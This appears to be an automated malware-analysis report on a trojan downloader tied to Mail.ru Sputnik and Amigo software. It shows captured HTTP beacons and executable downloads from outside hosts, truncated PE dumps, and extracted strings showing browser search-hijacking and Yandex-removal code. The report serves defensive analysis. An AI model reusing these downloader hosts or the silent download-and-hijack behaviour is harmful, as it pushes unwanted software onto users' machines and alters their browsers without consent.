r_online_url><![CDATA[hXXp://horses.zetecportal.ru/coi?guid=$__G
UID&sig=$__SIG&sid=15679&pid=9522]]></partner_online_url>..  
                          <referer>profitraf3</referer>.. 
                           <internet></internet>..        
                    <referer_inet>newcustom3</referer_inet>
;..                            <internet_silent></internet_si
lent>..                            <file_size><![CDATA[200
000]]></file_size>..                            <partner_n
ew_url_inet><![CDATA[hXXp://horses.zetecportal.ru/install?guid=$
__GUID&sig=$__SIG&hsig=$__HWSIG&ovr=$__OVR&file_id=301653297&browser=1
]]></partner_new_url_inet>..                            <m
pcln><![CDATA[9516]]></mpcln>..                        
    ..                            <homepage_search_only></hom
epage_search_only>..                            <partner_hom
<<< skipped >>>


POST /eadkh/cibnd/bmiob HTTP/1.1
Host: metrika.yandex.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Connection: Close
Content-Length: 268

agepa=Nk0QWfLzsjN0rYpKGg/MD0i/3cF1nVFsYy3zOcCxbhgBzz+tVA9mkznoDIJlelZHoxtFDKLCe51a/ASWqmhQdlU317uGdf0Cbc9Joz3T4Blc+BJ0zl9sN/SsnOsnVykChg+WYeJMAHErVbj5YL1sAL5ktcFe38g3nsNuXVd+Zwp6Jf9P9pt4yW3B/vf9bPCSUoq+n0utxU2xQjaQhboJvuxY+BVb8m4QEk+8sTqPnig=
HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Mon, 22 Sep 2014 14:33:56 GMT
Content-Type: application/download
Content-Length: 1792
Connection: close
X-Powered-By: PHP/5.4.31
Content-Description: File Transfer
R0V6g2Wpw7DYtbo3EJiGx7O4awGsJCX6XSu2pid8JFSifjjh1aDfgx2UgrgP7zr92VKRBW
zT7yIVL jZyg61YMgN75uii5H8hYS3ZaMaang8PYXgJejHBL/rYuYHKCOU5zYx6RTU2zlN
NmZOqTcUysqttf4kKExemIUqeRJsLEa22LCKAkhWT 4KwRyoMhBZFoiSZk/VrqX9VhcHNN
56/N5JMuUq/GEVCpm6WI8ebL jSpwQ0 jw5YE5kpqiJzwWaEOE6Mn4jq19zWH8utmCSMTD
dgH3SplqsTpbtQ2nLJg5Ez45iOiMXqZ4Uk Tq 81q3EYkH98zvdoCyaPkvD8TuJJZmk/Gv
xJ2PI5nflxPgoQLAj6007anCbzTJNCb5n2AHn1duqzbwkHOA0TPe29inAhuZ11cj6mVmeK
V8YLOLsbq3mSNp4axXF4qLpWbtpZcxKH1nC75Fyf5HSJhsCqaiz19pNbXL0TA4K4VeCSyA
JegjdP5SCEP1MLB9XfUgzF5 iY6Euijzz/v64HcJWFi0eYd8FxXFZg Wp1uz6mUV8GTxTG
y6Dbm8MHsjduAz7qxMn7Yruz0bULr9I1ECo12XzgpO9S0UTez8I1aXrCQLeBpeMbo9Yexh
GaUBtepXgXpOqM7W1PguMQ/Cw8hkMiejBjJnUTa7w Klr1keGfs7Nc1KgbdqdSNFxoPnz6
o5pu2zkfI1vZ/D0ckcwi9A2LT2 gc2/ZMLSW2EDfKjyjH0Phkz29bX4uHiAqC8l/36mWwL
1eLUQunO2XD803bzA7PvJ8A5vxpYacRHLM1RBsh7zjzbxgH28oBOB5wwBE0QY20COCBXJ/
LZrUFQa7jj5m0xil7I8bvfvz81aCUIxM6RXrW4rHXtAs9AEzoJKOx/nW2baphQHdBeHL0X
DYf JBtfxzAhKNQxEWtZ9 n3GzbHkDxXIUXDwjtrtmQrZxFnvcHT2fqOJMkUepmJTGjzyW
NdVgHezqLJxoZ8dUskEVxMiuFcXwRwjBkXZjOjg9smCEAXM0W2kKIDP5rjPE8xUscw5pzu
9VQbXPoW5MqdrTVasXOr1JX2N25Qcu/gFGY6WuYayd vLXXwhYkK47QMnMZGOFpFiz1fYc
3QC8XFXbi1ufmFrq24BSLl0Qx3Y5OvpgVfhpX75JtSK9xOh9lwLfwsQFUnzjl3ky2 mQ92
tL66VMNZ5SakreMkhs4nbabN3wAcltRAQTKA9B9XTzXbmimyiO13QLVG IEG5gOXvJh2ox
2V7oneX3/4fzyIoMuenMzjNAt4faoBkfiivp0GLdWWa/tPXT2Hf4GVu7Llov3S1RL gDu4
N4xqVB29rrtH2zdQoOtxiEA4uyRMMpJ7gfnl gE7sRRCPS93j1pBJWLN7awubphhUvEQu2
UD5w9OaT10Wk4hrHvehuwxYL/LDIU/eMorBD2RobxjfYDlLxzT6U10KEOoGVZyed3U04Hm
VXFPQVZeXHdVd0AvSLJbfLhttOxzUhahOaUDeA5Z2hd8gxQMnKHBZtVwJBqQTS42fd
<<< skipped >>>


GET /update/2/version.txt?type=dse&guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=2977029993&br=ie&ovr=0&rfr=profitraf3&ovr_extid=&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 HTTP/1.1
Host: mrb.mail.ru
Accept: */*
User-Agent: sputnik_statistics
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/1.2.8
Date: Mon, 22 Sep 2014 14:33:58 GMT
Content-Type: text/html
Content-Length: 212
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx/1.2.8</center>..</bod
y>..</html>....



GET /AmigoDistrib.exe HTTP/1.1
Accept: */*
User-Agent: Downloader MLR 1.0.0
Host: amigobin.cdnmail.ru


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:54 GMT
Content-Type: application/octet-stream
Content-Length: 49697312
Connection: keep-alive
Last-Modified: Mon, 25 Aug 2014 14:51:06 GMT
ETag: "53fb4d5a-2f65220"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........u.T........
.............c7.......%.............................Rich............PE
..L...<..S.................6...........8.......P....@..............
....................i......................................p?..x......
.|............8.. ....................................................
........................................text....4.......6.............
..... ..`.data...$"[email protected]...|............
:..............@..@...................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................`D..PD..BD..0D...D.....
..@...@[email protected].."A..2A..BA..NA..ZA..fA..xA...A...A...A...A...A...
A...A...A...B.."B...B..HB..`B...B...B...B...B...B...B...C...C..&C..<
;C..JC..`C..pC...C...C...C...C...C...C...D..rB.......D..~D.......D....
...D..........<..S........M...............{.8.A.6.9.D.3.4.5.-.D.5.6
.4.-.4.6.3.c.-.A.F.F.1.-.A.6.9.D.9.E.5.3.0.F.9.6.}.....{.F.D.A.7.1.E.6
.F.-.A.C.4.C.-.4.a.0.0.-.8.B.7.0.-.9.9.5.8.A.6.8.9.0.6.B.F.}.....{.8.B
.A.9.8.6.D.A.-.5.1.0.0.-.4.0.5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B
<<< skipped >>>


GET /update/2/version.txt?type=install&GUID={1769696B-E1A8-4585-B64F-C79F60E969BA}&rfr=profitraf3&standalone=1&uacenabled=0&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5&uacpass=1 HTTP/1.1
Host: mrb.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/1.2.8
Date: Mon, 22 Sep 2014 14:33:56 GMT
Content-Type: text/html
Content-Length: 212
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx/1.2.8</center>..</bod
y>..</html>....



GET /install?guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=226722307&ovr=0&browser=ie&file_id=301653297&start=1&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 HTTP/1.1
Host: horses.zetecportal.ru
Accept: */*
User-Agent: sputnik_statistics
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:59 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
X-Powered-By: PHP/5.4.33
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 22 Sep 2014 14:33:59 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-be7d69863578579258dd7bc46084be295420; expires=Tue, 23-Sep-2014 14:33:59 GMT; path=/; domain=sumsungspectr.ru



GET /install?guid={1769696B-E1A8-4585-B64F-C79F60E969BA}&sig=226722307&ovr=0&browser=ie&file_id=301653297&search=1&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&tool=sputnik&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5 HTTP/1.1
Host: horses.zetecportal.ru
Accept: */*
User-Agent: sputnik_statistics
Connection: close


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:59 GMT
Content-Type: text/html
Content-Length: 0
Connection: close
X-Powered-By: PHP/5.4.33
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 22 Sep 2014 14:33:58 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: guest_sess_id=g-e8560dcba739d44828dbccdbeb2d449d5420; expires=Tue, 23-Sep-2014 14:33:58 GMT; path=/; domain=sumsungspectr.ru



HEAD /mailruhomesearch.exe HTTP/1.1
Accept: */*
User-Agent: Downloader MLR 1.0.0
Host: sputnikmailru.cdnmail.ru
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:52 GMT
Content-Type: application/octet-stream
Content-Length: 2820328
Connection: keep-alive
Last-Modified: Tue, 16 Sep 2014 19:56:36 GMT
ETag: "541895f4-2b08e8"
Accept-Ranges: bytes



GET /update/2/version.txt?type=install&GUID={1769696B-E1A8-4585-B64F-C79F60E969BA}&rfr=profitraf3&osver=xp&osbit=32&osvernum=5.1&ossp=ServicePack3&uac=0&ver=2.7.3.79&praetorian=0&qipguard=0&comp_mem=511&tool_mem=5&success=1&ieovr=0&ffovr=0&br=ie&brver=6.00&bfr=0&aftr=0&bfr2=&aftr2= HTTP/1.1
Host: mrb.mail.ru
Accept: */*
User-Agent: FULLSTUFF
Connection: close


HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx/1.2.8
Date: Mon, 22 Sep 2014 14:33:56 GMT
Content-Type: text/html
Content-Length: 212
Connection: close
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx/1.2.8</center>..</bod
y>..</html>....



GET /amigodl.php?i=33 HTTP/1.1
User-Agent: tiny-dl/nx
Host: gabport.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.1
Date: Mon, 22 Sep 2014 14:33:40 GMT
Content-Type: application/octet-stream
Content-Length: 112640
Connection: close
X-Powered-By: PHP/5.4.31
Content-Description: File Transfer
Pragma: no-cache
Content-Disposition: attachment; filename="Amigo.exe"
Content-Transfer-Encoding: binary
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........t.U........
..............>..............m3.......................:.......=....
.Rich............PE..L......T.................L...h......1........`...
[email protected].....@............................
.....\z..<....... .......................L.........................
..........hx..@............`..<............................text...b
K.......L.................. ..`.rdata..^!...`..."...P..............@..
@.data.... [email protected]... ........0...~.......
.......@[email protected][email protected]...................
......................................................................
......................................................................
......................................................................
......................................................................
.....................................................U.....S...`@.VW3.
.}........$....j.P.E.j.j.j.h....P.......u.j...$`@.G. .....d|._^3.[..].
j.V...`@..E...t8..@Pj@.. `@..U.j..M.QR..WV..(`@[email protected]`@..._^[..
].V..X`@[email protected]@.. `@..M.j.j [email protected]...`@.V...
[email protected]`@..._^[..][email protected].=.`@..E.3...$.....M.j.j j.
[email protected]...$`@.C...|._^3.[..]..E.j..U.Rh.,..PV...`@.V..L`@
.V....X`@..._^[..]...............W.=$`@[email protected].@...|.....
[email protected].................@....._..U..QVh......$`@..5P`@..
<<< skipped >>>


HEAD /AmigoDistrib.exe HTTP/1.1
Accept: */*
User-Agent: Downloader MLR 1.0.0
Host: amigobin.cdnmail.ru
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 22 Sep 2014 14:33:54 GMT
Content-Type: application/octet-stream
Content-Length: 49697312
Connection: keep-alive
Last-Modified: Mon, 25 Aug 2014 14:51:06 GMT
ETag: "53fb4d5a-2f65220"
Accept-Ranges: bytes







The Trojan connects to the servers at the folowing location(s):







MailRuUpdater.exe_1772:




.text
`.rdata
@.data
.rsrc
@.reloc
8%u,j
Mj.ht
8sqliu
u u
FTPSQR
u.VWhT
 2 34 567
;%STUV
xSSSh
FTPjKS
FtPj;S
C.PjRV
<%u7j
X<%u2j
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
boost::too_few_args: format-string referred to more arguments than were passed
boost::too_many_args: format-string referred to less arguments than were passed
C:\trunk\SputnikLib/reg_key.hpp
C:\trunk\SputnikLib/process_enumerate.hpp
C:\trunk\CommonFiles/Install_stat.h
path_name after converting %s
path_name before converting %s
boost::iequals( pEntry.szExeFile, process_name ) == true
mailru::sqlite_bind::column_string
C:\trunk\CommonFiles/sql_lite_bind.hpp
mailru::sqlite_bind::column_blob
mailru::sqlite_bind::column_byte_length
mailru::sqlite_bind::column_blob_as_string
..\CommonFiles\chromium_settings.cpp
chrome_url_overrides
hXXp://VVV.mail.ru
hXXp://mail.ru
yandex.ru
hXXp://mail.ru/cnt/9824
chrome-extension://hcncjpganfocbfoenaemagjjopkkindp/visual-bookmarks.html
C:\trunk\CommonFiles/file_util.h
template_url_data
mailru::chromium::settings::search_url
go.mail.ru
mail.ru
urls_to_restore_on_startup
startup_urls
suggest_url
search_url
alternate_urls
originating_url
instant_url_post_params
instant_url
image_url_post_params
image_url
favicon_url
hXXp://go.mail.ru/favicon.ico
search_url_post_params
search_terms_replacement_key
D15371FE-C188-4E99-9841-A91F3BCBCCC3
keyword
windows-1251
suggestions_url_post_params
suggestions_url
@MAIL.RU
.*yandex\.ru. clid.*
^(chrome-extension://)?(\w{32})?/?
hXXp://VVV.mail.ru/cnt/7861
hXXp://agent.mail.ru/ru/download/agent_windows/download.html?sputnik=1
hXXp://img.imgsmail.ru/r/agent/favicon.ico
hXXp://VVV.mail.ru/cnt/5087
2.5.3.136
hXXp://VVV.mail.ru/
hXXp://go.mail.ru/search?fr=fftb&q={SearchTerms}
hXXp://go.mail.ru/search?fr=fftb&q=
hXXp://VVV.mail.ru/cnt/5089
hXXp://m.mail.ru/cgi-bin/splash?opera=1
hXXp://VVV.mail.ru/cnt/5090
hXXp://go.mail.ru/search?q=%s&utf8in=1&fr=oprtb
@mail.ru
hXXp://suggests.go.mail.ru/ff3?q={SearchTerm}
hXXp://go.mail.ru/search_images?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_images.ico
hXXp://go.mail.ru/search_video?utf8in=1&q=%s&fr=oprtb
hXXp://go.mail.ru/favicon_video.ico
hXXp://VVV.mail.ru/cnt/5091
hXXp://redir.opera.com/speeddials/mail.ru
hXXp://redir.opera.com/bookmarks/mail.ru
hXXp://go.mail.ru/search?q=%s&fr=opr11
hXXp://mail.ru/cnt/7993/
hXXp://go.mail.ru/search?q={SearchTerms}&fr=chrome
hXXp://suggests.go.mail.ru/ff3?q={searchTerms}
hXXp://go.mail.ru/search?q={SearchTerms}&fr=mrch
hXXp://go.mail.ru/?pin=1
hXXp://mail.ru/cnt/10226
..\CommonFiles\default_browser.cpp
mailru::default_browser::find_executable
..\CommonFiles\enemy_soft_checker.cpp
ConverterIconsFromInternetToAmigo.cpp
C:\trunk\SputnikLib/one_instance.h
mailru::reg_keyT<0>::check
mailru::reg_keyT<0>::throw_on_error
InternetProtection.cpp
chrome-extension://deejpmlbpbmjecdbfhafkcjeknpnpngh/visual-bookmarks.html
Mail.Ru
hXXp://r.mail.ru/cln10322/odnoklassniki.ru
cln10322/odnoklassniki.ru
mail.ru/cnt
@Mail.Ru
hXXp://download.yandex.ru/bar/chrome/updates-translate.xml
hXXp://download.yandex.ru/bar/chrome/updates.xml
hXXp://download.yandex.ru/bar/chrome/updates-vb.xml
update_url
c:\trunk\sputniklib\auto_handle.hpp
c:\trunk\mailruupdater\concrete_update_task.hpp
Started with cmd line
main.cpp
C:\logging\MailRuUpdater.log
hXXp://xml.binupdate.mail.ru/ext_settings.json
replace_mail_extension.cpp
c:\trunk\mailruupdater\SendBrowsersStatistic.h
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_amigo>::getDSEurl
updater::SendBrowsersStastic::BrowserData<class mailru::chromium::settings_mail>::getDSEurl
mailru::sqlite_bind::column_int64
SendBrowsersStatistic.cpp
asio.misc
C:\trunk\3party\boost-1.49\boost/exception/detail/exception_ptr.hpp
asio.misc error
C:\trunk\3party\ticpp/ticpp.h
cmd_line
md5 fetch url
Program fetch url
fetch_url
update_info.cpp
util.cpp
YandexRemover.cpp
Can't terminate a sub-expression with an alternation operator |.
A regular expression can start with the alternation operator |.
Alternation operators are not allowed inside a DEFINE block.
More than one alternation operator | was encountered inside a conditional expression.
A repetition operator cannot be applied to a zero-width assertion.
Invalid alternation operators within (?...) block.
The \c and \C escape sequences are not supported by POSIX basic regular expressions: try the Perl syntax instead.
Found a closing repetition operator } with no corresponding {.
The repeat operator " " cannot start a regular expression.
The repeat operator "?" cannot start a regular expression.
The repeat operator "*" cannot start a regular expression.
right-curly-bracket
left-curly-bracket
0123456789
Unmatched quantified repeat operator { or \{.
Invalid preceding regular expression prior to repetition operator.
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
sqlite.cpp
mailru::sqlite::database::database
mailru::logging::execution_time_logger::~execution_time_logger
logger.cpp
HTTP/1.1
c:\trunk\sputniklib\http_downloader.h
mailru::http::request_headers::get_header
thread.exit_event
thread.entry_event
127.0.0.1
mailru::http::response_headers::get_file_time
mailru::http::response_headers::response_headers
^HTTP/1.1 (\d ) (. )
http_downloader.cpp
mailru::http::downloader_impl::handle_read_headers
mailru::http::downloader_impl::connection_data_file::~connection_data_file
mailru::http::downloader::fetch_file_attributes
HTTP error %2%: %3%
mailru::http::fetch_wstring_via_tempfile
Path.cpp
[%d][%d][d.d d:d:d]
<>"#%{}|\^~[] ?&@=:,
hXXps://
hXXp://
unzip.cpp
version_info.cpp
Resource.cpp
process_util.cpp
shortcut.cpp
is_admin.cpp
url_parser.cpp
mailru::url_parser::init
Line %d, Column %d
large file support is disabled
unknown operation
SQL logic error or missing database
foreign_keys
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_log
sqlite_source_id
sqlite_version
sqlite_attach
sqlite_detach
sqlite_stat1
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_table
RowKey
3.7.11
SQLite format 3
CREATE TABLE sqlite_master(
sql text
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
922337203685477580
SQLITE_
?API call with %s database connection pointer
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
%s\etilqs_
cannot limit WAL size: %s
2nd reference to page %d
invalid page number %d
%s(%d)
keyinfo(%d
%r %s BY term out of range - should be between 1 and %d
Expression tree is too large (maximum depth %d)
too many SQL variables
variable number must be between ?1 and ?%d
too many columns in %s
%s OR name=%Q
type='trigger' AND (%s)
table %s may not be altered
sqlite_
SELECT tbl,idx,stat FROM %Q.sqlite_stat1
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
duplicate column name: %s
too many columns on %s
DELETE FROM %Q.%s WHERE %s=%Q
sqlite_stat%d
unknown column "%s" in foreign key definition
number of columns in foreign key does not match the number of columns in the referenced table
foreign key on %s should reference only one column of table %T
a JOIN clause is required before %s
cannot modify %s because it is a view
table %s may not be modified
foreign key mismatch
error during initialization: %s
no entry point [%s] in shared library [%s]
unable to open shared library [%s]
sqlite3_extension_init
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s:%d
no such index: %s
SCAN TABLE %s %s%s(~%d rows)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
sqlite_master
sqlite_temp_master
vtable constructor did not declare schema: %s
vtable constructor failed: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
%s (~%lld rows)
%s VIRTUAL TABLE INDEX %d:%s
%s (rowid<?)
%s (rowid>?)
%s (rowid>? AND rowid<?)
%s (rowid=?)
%s USING INTEGER PRIMARY KEY
%s USING %s%sINDEX%s%s%s
%s AS %s
%s TABLE %s
%s SUBQUERY %d
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
foreign key constraint failed
unable to use function %s in the requested context
zeroblob(%d)
CREATE TABLE %Q.%s(%s)
%s %T cannot reference objects in database %s
default value of column [%s] is not constant
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
no such collation sequence: %s
%s - %s
malformed database schema (%s)
cannot join using column %s - column not present in both tables
cannot have both ON and USING clauses in the same join
a NATURAL join may not have an ON or USING clause
%s.%s
bind on a busy prepared statement: [%s]
%s: %s
%s: %s.%s
%s: %s.%s.%s
misuse of aliased aggregate %s
not authorized to use function: %s
too many terms in %s BY clause
EXECUTE %s%s SUBQUERY %d
%.*s"%w"%s
%s%.*s"%w"
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
Cannot add a PRIMARY KEY column
invalid name: "%s"
automatic extension loading failed: %s
d-d-d d:d:d
d:d:d
d-d-d
SELECTs to the left and right of %s do not have the same number of result columns
LIMIT clause should come after %s not before
ORDER BY clause should come after %s not before
BmTindexed columns are not unique
%s-shm
Recovered %d frames from WAL file %s
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Failed to read ptrmap key=%d
failed to get page %d
%d of %d pages missing from overflow list starting at %d
freelist leaf count too big on page %d
Fragmentation of %d bytes reported as %d on page %d
Multiple uses for byte %d of page %d
Corruption detected in cell %d on page %d
On page %d at right child:
On tree page %d cell %d:
unable to get the page. error code=%d
btreeInitPage() returns error code %d
Page %d:
Outstanding page count goes from %d to %d during this analysis
Pointer map page %d is referenced
Page %d is never used
sqlite3_get_table() called with two or more incompatible queries
no such vfs: %s
%s mode not allowed: %s
no such %s mode: %s
MJ delete: %s
-mjX9X
MJ collide: %s
%s-mjXXXXXX9XXz
database %s is locked
cannot detach database %s
no such database: %s
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
unable to close due to unfinished backup operation
unknown database: %s
unknown database %s
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.sqlite_sequence WHERE name=%Q
PRIMARY KEY must be unique
%s.%s may not be NULL
database schema is locked: %s
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
PRAGMA vacuum_db.synchronous=OFF
cannot VACUUM - SQL statements in progress
misuse of aggregate: %s()
constraint failed at %d in [%s]
abort at %d in [%s]: %s
database table is locked: %s
cannot change %s wal mode from within a transaction
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot commit transaction - SQL statements in progress
cannot release savepoint - SQL statements in progress
no such savepoint: %s
cannot open savepoint - SQL statements in progress
statement aborts at %d: [%s] %s
cannot use index: %s
at most %d tables in a join
cannot open value of type %s
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
unsupported file format
no such trigger: %S
unable to open database: %s
database %s is already in use
too many attached databases - max %d
sqlite_sequence
there is already an index named %s
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
no such index: %S
unable to identify the object to be reindexed
no such table: %s
sqlite_subquery_%p_
cannot create INSTEAD OF trigger on table: %S
cannot create %s trigger on view: %S
cannot open %s column for writing
no such column: "%s"
cannot open view: %s
cannot open virtual table: %s
indexed
foreign key
sqlite_altertab_%s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
CREATE%s INDEX %.*s
table %s has no column named %s
sqlite_autoindex_%s_%d
index %s already exists
there is already a table named %s
virtual tables may not be indexed
views may not be indexed
table %s may not be indexed
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
table "%s" has more than one primary key
CREATE TABLE %Q.sqlite_sequence(name,seq)
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE %s %.*s
view %s is circularly defined
table %S has no column named %s
%d values for %d columns
table %S has %d columns but %d values were supplied
*** in database %s ***
unsupported encoding: %s
foreign_key_list
no such column: %s
there is already another table or index with this name: %s
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
view %s may not be altered
-- TRIGGER %s
use DROP VIEW to delete view %s
use DROP TABLE to delete table %s
table %s may not be dropped
sqlite_stat
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
Visual C   CRT: Not enough memory to complete call to strerror.
portuguese-brazilian
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
</%s>
<!--%s-->
&#xX;
<![CDATA[%s]]>
%s='%s'
%s="%s"
standalone="%s"
encoding="%s"
version="%s"
href="%s"
type="%s"
c:\trunk\3party\ticpp\ticpp.h
ticpp.cpp
Type is unsupported
%d / %m / %y
%I : %M : %S %p
%m / %d / %y
%b %d %H : %M : %S %Y
GetProcessHeap
KERNEL32.dll
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
RegEnumKeyExW
RegQueryInfoKeyW
ADVAPI32.dll
FindExecutableW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
WS2_32.dll
PSAPI.DLL
WTSAPI32.dll
VERSION.dll
CreateIoCompletionPort
GetCPInfo
ShellExecuteExW
CoInternetParseUrl
urlmon.dll
.?AVexception@sqlite@mailru@@
.?AV?$typeid_wrapper@V?$resolver_service@Vtcp@ip@asio@boost@@@ip@asio@boost@@@detail@asio@boost@@
.?AV?$typeid_wrapper@V?$stream_socket_service@Vtcp@ip@asio@boost@@@asio@boost@@@detail@asio@boost@@
.?AV?$sp_counted_impl_p@Vdownload_limitation@downloader_impl@http@mailru@@@detail@boost@@
.?AV?$sp_counted_impl_p@Vconnection_data_file@downloader_impl@http@mailru@@@detail@boost@@
